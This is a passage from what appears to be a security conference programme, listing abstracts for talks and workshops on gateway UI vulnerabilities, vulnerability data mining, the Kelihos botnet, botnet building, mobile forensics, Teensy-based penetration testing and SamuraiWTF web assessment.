After a thorough examination of a number of common Security Gateway products over the past few months I have determined that Security Gateway Web User Interfaces are often vulnerable to security flaws, which could enable an attacker to gain control of the UI, bypass controls within the application, and in many cases control the underlying operating system.

Based on this research I have reported over 30 vulnerabilities, complete with proof-of-concept exploits to the vendors of these products.

This presentation will discuss vulnerabilities common across these products, weaknesses in product design, and some interesting attack vectors where external attackers can exploit Security Gateways via the UI, even where the attacker has no direct access to the UI.

Chris Wysopal
Data Mining a Mountain of Zero Day Vulnerabilities

Every day, software developers around the world, from Bangalore to Silicon Valley, churn out millions of lines of insecure code. We used static binary analysis on thousands of applications submitted to us by large enterprises, commercial software vendors, open source projects, and software outsourcers, to create an anonymized vulnerability data set. By mining this data we can answer some interesting questions.

Which industries have the most secure and least secure code? What types of mistakes do developers make most often? Which languages and platforms have the apps with the most vulnerabilities? Should you be most worried of internally built apps, open source, commercial software, or outsourcers? These questions and many more will be answered as we tunnel through zero day mountain.

Kyle Yang
The Kelihos Botnet

Kelihos is still alive, building its p2p infrastructure and sending spam. It quickly evolves after b79 take down operation. This raises numerous questions:

Did it survive in the b79 operation or just re-build a new one? How did it evolve? Is there any changes in its infrastructure? Does it change the p2p protocol or communication encryption algorithms? What are the new functionality added in it? In this presentation, I will attempt to shed light on those interrogations after examining 3 main Kelihos generations, from its p2p protocol and encryption schemes to the working mechanisms.


Ken Baylor
Workshop: Understanding Botnets By Building One

Financial botnets are a major threat to the global Financial Infrastructure. Other botnets threaten our infrastucture. However, most security professionals have no hands-on botnet experience, which weakens their ability to combat them.

Gain hands-on experience of building and managing your own botnet from scratch in this workshop.

You will build your own Zeus botnet, configure and optimize it, infect and control bots.

Eric Fulton
Workshop: Mobile Network Forensics

Intentionally or not, your phone leaks data to the world. What can you-- or your enemies-- uncover from mobile network traffic? Dig through real-life Android packet captures to uncover GPS coordinates, usernames and accounts, social networking data, and more. Dissect a traffic dump of Android malware and analyze phone data as it is exfiltrated to third-party servers. The second half of this workshop is a mobile network forensics contest. Each attendee will be given a mysterious USB drive and a note with a challenge. Students must use the skills they've gained in class to unravel the mystery. You are the forensics investigator. Can you solve the puzzle in time?

Nikhil Mittal
Workshop: Teensy Programming for Everyone

Breaking into systems is getting harder by day using traditional methods. As a penetration tester or a security administrator you should know what methods an attacker may use to compromise a system. The emphasis of this training will be on using Teensy which is a Human Interface Device. It is an Arduino board based device which can be programmed and used as a keyboard/mouse/disk.

Details about Kautilya will be discussed which is a toolkit developed by the trainer which eases the use of Teensy in Penetration Tests. The participants will learn about programming Teensy as per their need using Arduino Development Environment (ADE) and also to customize Kautilya.

There will be lots of attack vectors, discussions, hands on and fun. Participants should be able to program their own devices after the training.

Justin Searle
Workshop: SamuraiWTF

Come take the official Samurai-WTF workshop given by one of the founders and lead developers of the project, and get special pre-release copy of the next version of Samurai-WTF. You will learn the latest Samurai-WTF open source tools and be shown the latest techniques to perform web application assessments. Practice these skills on one of four vulnerable web applications installed and pre-configured on your Samurai-WTF live DVD. This experience will increase your hacking toolkit and take your web hacking skills to the next level.